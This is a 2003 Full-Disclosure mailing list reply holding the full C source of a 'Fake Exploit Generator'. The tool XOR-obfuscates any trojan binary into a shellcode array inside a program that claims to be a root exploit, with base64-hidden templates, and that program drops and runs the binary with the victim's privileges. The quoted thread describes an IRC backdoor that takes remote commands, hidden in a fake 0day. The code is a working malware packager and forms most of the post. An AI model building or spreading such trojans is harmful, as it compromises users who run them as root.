Message-ID: <200306132239.03885.gml@phrick.net>
From: gml at phrick.net (gml)
Subject: Re: -1 day exploit - Warning

On Friday 13 June 2003 06:51 pm, David Bernick wrote:

Well anyway, I got inspired:

// Fake Exploit Generator
// gml@...ick.net
//

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

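/* True when character c is not in the base64 alphabet.  As a side effect p
 * receives the address of c inside b64string (or NULL); b64dec recovers the
 * 6-bit value as p - b64string.  The search is bounded by the table size
 * instead of a literal 64 so the two cannot drift apart, and the terminating
 * NUL is deliberately left outside it so '\0' is rejected too. */
#define badchar(c, p) (!((p) = memchr(b64string, (c), sizeof(b64string) - 1)))

/* Post-processor run over the generated source by main(); undefine to skip. */
#define BEAUTIFY "indent"

/* Standard base64 alphabet, indexed by 6-bit value. */
static char b64string[] =
	"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* Base64 of the preamble written at the top of the generated file: a
 * "generated with Fake Exploit Generator" comment followed by #includes
 * for stdio.h, sys/types.h, sys/stat.h and unistd.h.  sizeof(header)
 * counts the trailing NUL, so callers must decode sizeof(header) - 1. */
static char header[] = {
"Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr"
"Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1"
"ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K"
};

/* Base64 of the rest of the generated program, emitted after the
 * shellcode[] array.  It decodes to: usage(), which exits unless running
 * as root (getuid() == 0) and a <target> argument was given; setup(),
 * which XORs each byte of shellcode[] with MAX into a tmpnam() file,
 * chmod()s it 0755, system()s it and unlink()s it; and a main() calling
 * both.  The "exploit" therefore just drops and runs the embedded binary
 * with whatever privileges the victim gave it.  As with header, decode
 * sizeof(body) - 1 bytes. */
static char body[] = {
"dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK"
"CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g"
"bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy"
"KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0"
"KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK"
"CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w"
"ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs"
"Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3"
"cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw"
"NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu"
"dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo"
"KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K"
};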

/*
 * Decode base64 text from 'from' into 'to'.
 *
 * 'len' input bytes are consumed four at a time; each quad yields three
 * output bytes and the output is NUL-terminated after the last full quad.
 * '=' is accepted in any column and contributes zero bits, but only '=' in
 * the third or fourth column is counted as padding; that count is reset by
 * a non-'=' character in those columns, so it reflects the final quad only.
 *
 * Returns the number of payload bytes written (padding already subtracted),
 * or -1 if a character outside the alphabet was met (output is then partial
 * and NOT terminated) or if 'len' is not a multiple of four (the complete
 * quads have already been written and terminated when this is reported).
 */
long b64dec (char *to, char *from, unsigned int len)
{
	char *in = from;
	char *out = to;
	int pad = 0;

	while (len >= 4) {
		unsigned char sextet[4];
		unsigned int i;

		/* Map the four input characters to their 6-bit values. */
		for (i = 0; i < 4; i++) {
			unsigned char ch = (unsigned char)*in++;
			char *hit;

			if (ch == '=') {
				sextet[i] = 0;
				if (i >= 2)
					pad++;	/* trailing '=' only */
				continue;
			}
			if (badchar(ch, hit))
				return -1;
			sextet[i] = (unsigned char)(hit - b64string);
			if (i >= 2)
				pad = 0;	/* a real byte cancels earlier padding */
		}

		/* 4 x 6 bits -> 3 x 8 bits; the casts drop the high bits. */
		*out++ = (char)((sextet[0] << 2) | (sextet[1] >> 4));
		*out++ = (char)((sextet[1] << 4) | (sextet[2] >> 2));
		*out++ = (char)((sextet[2] << 6) | sextet[3]);
		len -= 4;
	}

	*out = '\0';
	if (len)
		return -1;
	return (out - to) - pad;
}

void printhex(char c, FILE *fp)
{

    char s[10];

    if(c < 16 && c >= 0)
    {
        fprintf(fp, "\\x%2.2x", c);
    }
    else
    {
        if(c > 0)
        {
            fprintf(fp, "\\x%2.2x", c);
        }
        else
        {
            sprintf(s, "%x", c);
            fprintf(fp, "\\x%c", s[6]);
            fprintf(fp, "%c", s[7]);
        }
    }
}

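/* Copy 'in' to EOF onto 'out' as rows of up to 16 "\xNN" escapes, each row
 * a quoted C string fragment, with every byte XORed against 'key'.
 * An empty input still yields one "" so the initializer stays valid C.
 * Returns 0, or -1 on a read error (write errors surface at fclose()). */
static int emit_shellcode(FILE *in, FILE *out, int key)
{
    int c;
    int col = 0;
    long total = 0;

    while ((c = fgetc(in)) != EOF) {
        if (col == 0)
            fputc('"', out);
        printhex((char)(c ^ key), out);     /* obfuscate */
        total++;
        if (++col == 16) {
            fputs("\"\n", out);
            col = 0;
        }
    }
    if (total == 0)
        fputs("\"\"\n", out);
    else if (col != 0)
        fputs("\"\n", out);                 /* close a partial last row */
    return ferror(in) ? -1 : 0;
}

#ifdef BEAUTIFY
/* Run BEAUTIFY on 'path' directly rather than through system(), so the
 * file name is a single argv entry and is never parsed by a shell.
 * Returns the child's exit status, or -1 if it could not be run. */
static int run_beautifier(const char *path)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        execlp(BEAUTIFY, BEAUTIFY, path, (char *)NULL);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
#endif

/* fakeexp generator: writes argv[2] as C source consisting of the decoded
 * header template, a shellcode[] array holding argv[1] XORed with argv[3],
 * and the decoded body template; then optionally reformats it.
 * Exits 0 on success, 1 on a bad key, I/O failure or corrupt template. */
int main(int argc, char *argv[])
{
    FILE *trojan = NULL;
    FILE *fakeexp = NULL;
    char *decoded = NULL;
    size_t decoded_sz;
    char *end;
    long key;
    int rc = 1;

    if(argc < 4 )
    {
        printf("usage: %s trojan fakeexp.c key\n", argv[0]);
        printf("ex: %s trojan fakeexp.c 187\n", argv[0]);
        exit(0);
    }

    /* The key is both the XOR byte and the literal text of the generated
     * "#define MAX", so anything but a decimal in 0..255 would either be
     * silently truncated or make the output fail to compile. */
    key = strtol(argv[3], &end, 10);
    if (end == argv[3] || *end != '\0' || key < 0 || key > 255) {
        fprintf(stderr, "%s: key must be a decimal integer in 0..255\n", argv[0]);
        return 1;
    }

    trojan = fopen(argv[1], "rb");
    if (!trojan) {
        perror(argv[1]);
        goto done;
    }
    fakeexp = fopen(argv[2], "w");
    if (!fakeexp) {
        perror(argv[2]);
        goto done;
    }

    /* Decoded base64 is never longer than its input, so the larger of the
     * two templates bounds the scratch buffer for both. */
    decoded_sz = sizeof(body) > sizeof(header) ? sizeof(body) : sizeof(header);
    decoded = malloc(decoded_sz);
    if (!decoded) {
        perror("malloc");
        goto done;
    }

    /* sizeof() counts the terminating NUL, which b64dec reports as a
     * length error, so decode exactly the base64 text and check the result. */
    if (b64dec(decoded, header, sizeof(header) - 1) < 0) {
        fprintf(stderr, "%s: corrupt header template\n", argv[0]);
        goto done;
    }
    fprintf(fakeexp, "%s", decoded);

    fprintf(fakeexp, "\n#define MAX\t%ld\n\n", key);
    fprintf(fakeexp, "static char shellcode[] = {\n");
    if (emit_shellcode(trojan, fakeexp, (int)key) < 0) {
        perror(argv[1]);
        goto done;
    }
    fprintf(fakeexp, "};\n\n");

    if (b64dec(decoded, body, sizeof(body) - 1) < 0) {
        fprintf(stderr, "%s: corrupt body template\n", argv[0]);
        goto done;
    }
    fprintf(fakeexp, "%s", decoded);

    /* fclose() is where buffered write errors (e.g. a full disk) show up. */
    if (fclose(fakeexp) != 0) {
        fakeexp = NULL;
        perror(argv[2]);
        goto done;
    }
    fakeexp = NULL;
    rc = 0;

#ifdef BEAUTIFY
    /* Reformatting is cosmetic; a missing indent(1) is not a failure. */
    run_beautifier(argv[2]);
#endif

done:
    free(decoded);
    if (trojan)
        fclose(trojan);
    if (fakeexp)
        fclose(fakeexp);
    return rc;
}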


> > Wow, I'd never run something that had a printf statement in it with
> >
> >  print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake
> >  0day exp loit. v2\nPRIVMSG $chan :to run commands on me, type:
> > ".$nick.": command\n";
> >
> > if you run this you deserve to get owned.  this guy could have at least
> > xor'd the strings and base64 encoded them or SOMETHING.
>
> The printf statement is in the shellcode: if you don't know C and/or hex
> very well it looks semi-legit. The attached Perl code is the decoded
> shellcode; it is not present in the actual "exploit" as distributed. This is
> the perfect kind of program to trojan little hacker wannabes on IRC.
>
> and no one deserves to be owned. They just need to pay for highly paid
> security consultants instead (shhh..kidding).
>
> d
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

